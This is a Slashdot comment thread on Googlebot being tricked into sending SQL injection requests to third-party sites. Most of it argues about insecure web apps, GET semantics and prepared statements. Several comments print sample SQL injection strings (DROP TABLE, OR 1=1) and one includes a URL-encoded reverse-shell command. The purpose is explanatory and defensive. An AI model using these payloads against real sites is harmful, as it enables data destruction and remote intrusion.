Google Bots Doing SQL Injection Attacks
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."
promo4promo (Score:2)
Doing a good deed for your competition by linking them from your site, hmm? :)
How about Yahoo "bots", Bing "bots" ? (Score:5, Insightful)
TFA seems to place all the faults on Google.
Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
Re:How about Yahoo "bots", Bing "bots" ? (Score:5, Insightful)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Next you'll be suggesting that you could do that transparently to the user and have their browser re-use their already logged in session on another site to do things with their credentials for you!!!!
What will they think of next? It's a good thing we have these wonderful stories to explain how this whole web thingy works with all its links and stuff...
Re:How about Yahoo "bots", Bing "bots" ? (Score:4, Informative)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Real people don't have to click that link. Their computers and devices have web browsers that follow links ahead of time to improve the browsing experience. Chrome calls this "Predict network actions to improve page load performance".
But such hits would come from a wide variety of IPs, not from Google.
Re:How about Yahoo "bots", Bing "bots" ? (Score:4, Informative)
No need to use links, either.
Good old <img src="http://your.site.is/dumb?and=has+sql+injection%22;drop table users;--"/> would work just by visiting the site, as would an iframe, whether browser tries to be smart or not.
Re: (Score:2)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Why not just include an iframe, and have an onload javascript of the parent page navigate the iframe to various links?
Re: (Score:2)
Exactly. That's the sort of thing I mean by "transparently to the user". Sorry if my sarcasm was too obscure.
Re: (Score:1)
I scrolled a couple of pages down, but didn't see any SQL injection attack links. WHAT IS WRONG WITH YOU SLASHDOT?!
Re: (Score:3)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
This is actually very useful for more persistent attacks.
Re: (Score:2)
If they know what URL is being called to cause the problem, Site B might be able to identify Site A from its logs, at least for clients that include the Referer header in their requests. But once they've identified the URL itself, they can just fix the actual vulnerability, or block that specific URL with a redirect or something similar.
Once I found a major party's official state website allowed anyone to post and execute arbitrary PHP with full access via just filling in a comment text field, I stopped being surprise
Re: (Score:2, Funny)
You must work for some really shit firms, 'cause it's a well-known fact that what you're saying is bullshit.
Re: (Score:2)
A DDOS is by definition a distributed denial of service. If it was a deliberate attempt, it would be DDDOS.
I don't attack Microsoft but let's make sure we use terminology properly.
It wouldn't be a DDOS for a different reason: a Bing bot would not qualify as distributed.
Re: (Score:2)
No, a DoS is a Denial Of Service. DDoS is a Distributed Denial of Service.
Re: (Score:3)
Actually, bingbot is particularly stupid. It has downloaded several zip files of public domain material (each exceeding 1GB with total over 10GB) from our web site at home. It does so about once per month despite the fact that these files are unchanging, instead of merely doing a conditional GET and checking for a 304 return [w3.org]. The various googlebots all do it this way, as do other bots (e.g. docomo, yahoo, yandex).
We don't yet bar bingbot, but if it starts downloading several GB at times when other visitor
Re: (Score:2)
Actually, bingbot is particularly stupid. It has downloaded several zip files of public domain material (each exceeding 1GB with total over 10GB) from our web site at home. It does so about once per month despite the fact that these files are unchanging, instead of merely doing a conditional GET and checking for a 304 return [w3.org]. The various googlebots all do it this way, as do other bots (e.g. docomo, yahoo, yandex).
We don't yet bar bingbot, but if it starts downloading several GB at times when other visitors are looking at videos (mostly 720p and 1080p), it will find itself in the wrong part of robots.txt. If I get really irritated, then it will get customized garbage results, just like the ZmEu crap...
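For reference, the conditional GET the parent describes can be sketched in a few lines of Python. The URL, ETag, and date below are placeholders, not the actual site or files from the comment:

```python
import urllib.request

def conditional_request(url, last_etag=None, last_modified=None):
    """Build a GET that lets the server answer 304 Not Modified
    instead of re-sending an unchanged multi-gigabyte file."""
    req = urllib.request.Request(url)
    if last_etag:
        req.add_header("If-None-Match", last_etag)
    if last_modified:
        req.add_header("If-Modified-Since", last_modified)
    return req

# Values a polite crawler would have saved from its previous fetch:
req = conditional_request("http://example.com/archive.zip",
                          last_etag='"abc123"',
                          last_modified="Sat, 01 Jun 2013 00:00:00 GMT")
```

A crawler that sends these headers and honors the 304 response only pays for the full download when the file actually changes.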
And you can't just exclude the problem files instead of blocking the whole site?
Well, yes I could, obviously enough. But then the googlebot and other bots would be handicapped (I expect a change to at least two of those PD zipfiles during 2014). In summary, bingbot does it wrong while other bots do it right. These PD zipfiles are the most egregious examples, but there are also many smaller files where bingbot does it wrongly. So I'm likelier to bar bingbot than to bar other bots or to exclude these specific files.
As I said, bingbot is earnestly hoping for a customized middle finger
Re: (Score:2)
Interesting, since Yahoo in my locale uses Google. No Microsoft technology in sight.
Re: (Score:2)
Actually, now that you mention it, I can't find any yahoo bots in recent log files. Perhaps yahoo is also responsible for some of those stupid multi-gigabyte downloads as bingbot.
Re: (Score:2)
Why exactly should he go to the ridiculous lengths of explicitly blocking individual items when he can instead wholesale block what is clearly a hostile bot from a search engine nobody uses?
Re: (Score:2)
Look, Steve, I get that you want to push Bing as a viable search engine, but I think you'll find the only place anyone sees the name "Bing" associated with Internet searching is in movies and American dramas.
Re: (Score:2)
TFA seems to place all the faults on Google.
Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
Do not forget the NSA bots. The Chinese NSA equiv bots.
The French NSA equiv bots....
The FBI bots....
Re: (Score:1)
Let's see - they impose ZERO load?
Here's an example of a major one that doesn't.
Bing doesn't rate limit.
Bing doesn't obey robots.txt.
http://www.computersolutions.cn/blog/2012/05/msn-bing-crawler-spider-madness/
They still pull the same shit even now, so fuck bing.
could not care less (Score:5, Informative)
not just "could care less". Sheeesh.
Re:could not care less (Score:5, Funny)
Means the same thing irregardless.
Re: (Score:1)
Means the same thing irregardless.
I see what you did there.
Re: (Score:1)
Means the same thing irregardless.
Do you mean literally the same, or actually the same?
Re: (Score:1)
Wouldn't be at all surprised if they do care just a little bit, making the original correct and yours not.
Re:could not care less (Score:5, Interesting)
It's probably laziness, but it could also be a shortened version of "I could care less, but I'd have to try."
"Sure as hell" and "sure as shit" have no meaning either, right? How sure is hell, or shit? Those are shortened versions of "as sure as hell is hot" and "as sure as shit stinks". Language happens.
I'm more concerned with errors in non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have", "try and" instead of "try to", and #1 on my list, "literally" meaning "figuratively".
After we sort that out, we can come to an agreement on split infinitives, the Harvard comma, and whether punctuation that isn't part of a quote should be inside quotation marks or out. :-)
Re: (Score:3)
In a similar case I actually had a supplier put a line on a quote that translates to: "all products are available from stock if another date is mentioned in the line". What they meant was: "all pr
Re:could not care less (Score:4, Informative)
I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have"
THIS, a thousand times this!
I'm not much of a grammar nazi, as I view communication to be the primary purpose of text, not syntax... but "should of" actively takes chunks out of my brain every time I read it. It honestly makes me feel like I'm trying to talk to a retard, it just makes so little sense.
The worst part is, while currently it's almost exclusively native English speakers who make this mistake (which is pretty odd), soon enough people like me who learnt by practice are going to start using it en masse, and then it'll be here to stay (like "could care less" - another one perpetuated by native speakers, btw).
Re: (Score:2)
Let's see if we can't nip these in the bud.
a more elegant solution? (Score:2)
I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.
And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.
Re: (Score:2)
I don't so much mind the ones that mark the writer as an idiot* so much as the ones that change the meaning of what the idiot was trying to convey. "Writing in Python will make you loose your mind." Well, isn't setting your mind free a GOOD thing?
I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.
As to being native speakers, I corrected a fellow here
Re: (Score:2)
I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.
Yes, those are probably even worse... It makes me wonder how they were taught to write English. Nowadays you almost semi-automatically pick up on English just by hanging on the Internet a lot of the time, even if you've never met a native English speaker. One would expect grammar to be improved by it as well, but apparently not...
By the way, I learned two new words from your post, thanks :)
Re: (Score:2)
I love using the word "aliterate", people think it's a misspelling.
Re: (Score:2)
"Sure as hell" and "sure as shit" have no meaning either, right?
Well that's the point. Because they are totally meaningless as they stand, you know to look elsewhere to find the meaning. But omitting a "not" does not make "could care less" meaningless. It means something very definite, and the exact opposite of what is intended.
The idea that it's a shortened version doesn't stand up. It simply isn't said that way with the required intonation or timing. People say it because the phrase has become a meaningless, something said without any thought to what it breaks d
Re: (Score:2)
Actually, since they are there already, crawling it, they really could care less. They could not be there at all, but no. They do care, and are crawling.
So it was correct to say they could care less.
Well, the quote says 'could care less about your site'. I doubt google care one iota about most individual sites in isolation. They care a great deal about the web in general to be sure, but if they cared about your site, they'd send a person to look at it rather than an automated crawler.
Re: (Score:2)
Yeah, right. Sure it is.
Uhh... (Score:5, Insightful)
If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.
Re: (Score:3, Informative)
I wholeheartedly agree. Database programming 101: you cannot trust any inputs (user or otherwise). You must assume that any input is malicious and sanitize it as such. Maybe the devs that are researching/complaining about this should consider the target as the problem, not the 12,000 different ways to input malicious code.
Re: (Score:2, Insightful)
Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?
Yes, there is something "wrong" - Google has no idea what is or is not a "malformed" request. You're basically asking Google to sanitize the database input, which is generally not possible if you don't know anything about what the database should or should not accept. Adding something along the lines of 'user=root' or 'page=somekindofdata' to a query may be perfectly legitimate for one site, and a massive problem for a different one.
Re: (Score:1)
Not even that. For many text fields, e.g. the Slashdot comment field, SQL statements can be completely valid input. I could be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.
Seeing SQL input (or Javascript, same problem) as malicious results in people writing filters that prevent posting answers to SQL (or Javascript) related questions. Seeing it
Re: (Score:2)
I'd say it depends on the page's content. I really can't think of a valid reason for SQL statements or Javascript snippets on pages about celebrity A or pet B, or most other fields of interest outside of IT.
Re: (Score:2)
The keyword there was "effectively straight".
There is nothing wrong with having params like that. As long as you escape them properly and have input validation.
"Effectively straight" in this case means this would work: http://stocksite.com/charts.lol?symbol=GOOG&range=30 [stocksite.com]; DROP TABLE stocks --
Which is a taboo.
Re:Uhh... (Score:5, Informative)
Friends don't let friends generate dynamic SQL. Please use prepared statements!
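A minimal sketch of what that looks like, using Python's sqlite3 for illustration (the table and column names are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE stocks (symbol TEXT, price REAL)")
conn.execute("INSERT INTO stocks VALUES ('GOOG', 1120.0)")

# With a prepared statement the input is bound as data, never spliced
# into the SQL text, so an injection payload is just a weird symbol name.
payload = "GOOG'; DROP TABLE stocks; --"
rows = conn.execute("SELECT price FROM stocks WHERE symbol = ?",
                    (payload,)).fetchall()
print(rows)   # [] : the payload matched nothing, and the table survived

rows = conn.execute("SELECT price FROM stocks WHERE symbol = ?",
                    ("GOOG",)).fetchall()
print(rows)   # [(1120.0,)]
```

The same placeholder style (`?`, `%s`, or named parameters, depending on the driver) works in essentially every database API, and it also lets the server cache the statement plan.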
How is that news? (Score:2)
HTTP RFC - Section 9.1 Safe and Idempotent Methods (Score:5, Informative)
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
Re:HTTP RFC - Section 9.1 Safe and Idempotent Meth (Score:5, Interesting)
This is Slashdot. What do we know about GET HEAD methods?
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
Re: (Score:3)
TFA isn't newsworthy in my opinion, this has been known for a while now.
Re: (Score:3)
The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you use a query to a db for something like a parts catalog that's capable of r/w, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.
Blaming Google or any other crawler-spider-bot, despite my other disdain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times
Re: (Score:3)
As for the back-end countermeasures you described, you are of course spot on; however, it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have had the foresight to set up and use different DB roles, each with the absolutely least privs
Re: (Score:2)
Yes, we agree; that's the problem with blaming Google, and affirmation of the silliness. What I didn't get across, and I apologize, is that query code has become awful, let-me-count-the-ways.
Further, when I'm forced to, looking at page code makes me reel with the revelation of the mindset: cut-and-paste APIs glued with mucilage (if it's even that good). Everyone else is now to blame, not the moshpit of duct-taped code. Sorry, bad rant on a bad day.
Re: (Score:3)
If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
Then you don't need to waste CPU time and memory escaping input data.
Re: (Score:2)
so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.
That would be a bug in the application.
The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.
For all I know; if there's a bug in the application adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261
Re: (Score:2)
Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.
Re: (Score:3)
It's not the admins of the sites embedding the links that are the problem. They're the attackers. The fault lies with the admins of the sites the links point to.
Re: (Score:3)
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
Which is a great segue to the obligatory xkcd comic!
http://xkcd.com/327/ [xkcd.com]
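The parent's point, that a successful injection turns a "read" into a write, can be demonstrated in a few lines. This sketch uses sqlite3's `executescript` to stand in for drivers or configurations that allow stacked statements (Python's normal `execute` refuses them); the table and parameter names are made up:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    "CREATE TABLE stocks (symbol TEXT);"
    "INSERT INTO stocks VALUES ('GOOG');"
)

# The attacker-supplied "symbol" parameter from a GET query string:
user_input = "'GOOG'; DELETE FROM stocks; --"

# The application *meant* this to be a read-only SELECT...
conn.executescript("SELECT * FROM stocks WHERE symbol = " + user_input)

# ...but the stacked DELETE ran too: the table is now empty.
print(conn.execute("SELECT COUNT(*) FROM stocks").fetchone()[0])
```

So the GET request was "safe" only in the author's intent, not in what the database actually executed.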
Re: (Score:2)
It's great that you and the other AC can describe programming best practices. Sounds like you've singlehanded solved the problem of bad programming. Now if you can just go back and fix up the millions of vulnerable sites, the world will be a better place.
Thank you.
Re: (Score:2)
Does it? The ajax requests slashdot uses are POST requests, not GET.
Anything handling a GET request shouldn't be using a database connection with delete, insert or update grants.
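In MySQL-flavored SQL, that least-privilege setup might look something like this (the account names, schema, and passwords are hypothetical):

```sql
-- Read-only account for whatever serves GET requests
CREATE USER 'webread'@'localhost' IDENTIFIED BY 'changeme';
GRANT SELECT ON shop.* TO 'webread'@'localhost';

-- A separate, better-guarded account for handlers that legitimately write
CREATE USER 'webwrite'@'localhost' IDENTIFIED BY 'changeme2';
GRANT SELECT, INSERT, UPDATE, DELETE ON shop.* TO 'webwrite'@'localhost';
```

Even a successful injection through a GET handler then can't DROP or DELETE anything, because the connection simply lacks the grants.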
How would you know if it worked? (Score:1)
Re: (Score:2)
If your rival's site suddenly had a 99% sale on all products. :)
Re: (Score:2)
the site goes down. you can then guess it worked.
or a port opens at the target host, whatever the attack did.
as for using it for DOS, the target site doesn't even need to be faulty.
Skype too (Score:5, Interesting)
Heard this before (Score:2)
I vaguely recall an article years ago on something like TheDailyWtf where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data was getting trashed repeatedly, until he figured out it was the crawling bots.
This is nothing new: unskilled developers using the wrong methods and getting burned.
Lies, Damn Lies! (Score:2)
What is going on?
It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.
no, what's really happening is someone posted an injection url on a forum somewhere and googlebot ran across it. come on, google bot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.
reminds me of someone from irc... (Score:3)
This guy (who I won't name, you know who you are) was once writing some PHP code for some webapp. Well, in the app he had some delete links, and apparently he hadn't finished the authentication code, so googlebot crawled his site, followed all of the delete links, and completely wiped out his database.
Of course, you can keep googlebot away from your crappy code with robots.txt too...
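As a stopgap, a robots.txt like the following keeps well-behaved crawlers out of state-changing paths (the paths here are hypothetical):

```
User-agent: *
Disallow: /admin/
Disallow: /contacts/delete/
```

robots.txt is advisory only, of course. It does nothing against a crawler or attacker that ignores it, so it's no substitute for putting destructive actions behind POST and authentication.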
Read RFC 2616: Safe and Idempotent Methods .. (Score:2)
Re: (Score:2)
I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?
Re: (Score:3)
I can't tell if you're serious, so I'm going to act like you are in case you or some other reader doesn't understand the problem:
In the URL that you'd be using to hit that page, change the "id=42" or whatever you have there to "id=0 OR 1=1". Poof, your page is now reading the entire catalog in rather than the single record you wanted to. Hit that fast enough, and if that catalog is large enough, and the bad guy may have just brought your nice database server to a screaming halt as it loads up 300 million re
Re: (Score:2, Funny)
I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?
Dude... you forgot to encrypt your databases.... it should be
$catalogname = str_rot13('catalog'); $idname = str_rot13('id');
$id = str_replace(';', '', $id); ...
"select * from $catalogname where $idname=".$id
Make sure to insist that register_globals is set to On in the PHP settings for the web server.
Re: (Score:2)
Assuming you're actually serious, what happens when your page is requested with: ?id=0;%20drop%20table%20catalog;
Suddenly your query gets transformed to: select * from catalog where id=0; drop table catalog;
Re: (Score:1)
Because Little Bobby Tables. [xkcd.com]
http://your.site/dumbass.php?id=10; DROP TABLE catalog; --
Did anybody read TFA? (Score:5, Interesting)
The point is not that you can attack a lousy website using GET requests. The idea is that HTTP firewalls should not blatantly white-list google bots and other website crawlers for the sake of SEO, because google bot will follow malicious links from other websites.
So let's say you have a filter with rules that prevent common SQL injections in GET request parameters. This is a weak security practice, but it can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be bypassed IF you white-listed google bot.
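A toy illustration of the hole described above. The filter pattern and user-agent strings are made up, and real WAF rules are far more involved, but the shape of the mistake is the same:

```python
import re

# Naive signature for common SQLi fragments (illustrative only)
SQLI_PATTERN = re.compile(r"(;|--|\b(drop|union|insert)\b)", re.IGNORECASE)

def naive_waf(user_agent, query_string):
    # The mistake: skip filtering entirely for "Googlebot" to protect SEO
    if "Googlebot" in user_agent:
        return "allow"
    return "block" if SQLI_PATTERN.search(query_string) else "allow"

payload = "id=1; DROP TABLE users; --"
print(naive_waf("Mozilla/5.0", payload))
# -> block
print(naive_waf("Mozilla/5.0 (compatible; Googlebot/2.1)", payload))
# -> allow: the same payload sails through when Googlebot delivers it
```

An attacker only has to publish the malicious link somewhere a crawler will find it, and the whitelisted bot carries the payload past the filter for them.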
You're holding it wrong (Score:1)
If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.
I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh
Really? (Score:2)
So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.
That's kind of cool, actually.
I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.
I had that happen to me once. (Score:3, Interesting)
When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.
(I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)
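For what it's worth, the fix alluded to above is small: the destructive action goes behind a POST form rather than a crawler-clickable link (paths and field names hypothetical), ideally with authentication and a CSRF token on top:

```html
<!-- Instead of: <a href="/contacts/delete?id=3">delete</a> -->
<form method="POST" action="/contacts/delete">
  <input type="hidden" name="id" value="3">
  <button type="submit">Delete</button>
</form>
```

Crawlers don't submit forms, and per RFC 2616 a GET should never change state anyway.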
technology (Score:1)
The core of the matter. (Score:2)
Re: (Score:1)
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.
FTFY.
Re: (Score:2)
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.
FTFY.
I do like that better. Thank you.
Poor websites (Score:1)
Could care less? (Score:2)
So they do care a bit then?
The Caring Continuum - http://incompetech.com/Images/caring.png [incompetech.com]
Don't blame Google (Score:1)
Parameterize SQL? (Score:2)
My god, it's 2013 and we're talking about SQL injection? If you're not parameterizing your SQL, you're doing it wrong.
The correct phrase is... (Score:2)
"couldn't care less"
If you could care less it would not really be worth mentioning.
HTML verbs (Score:1)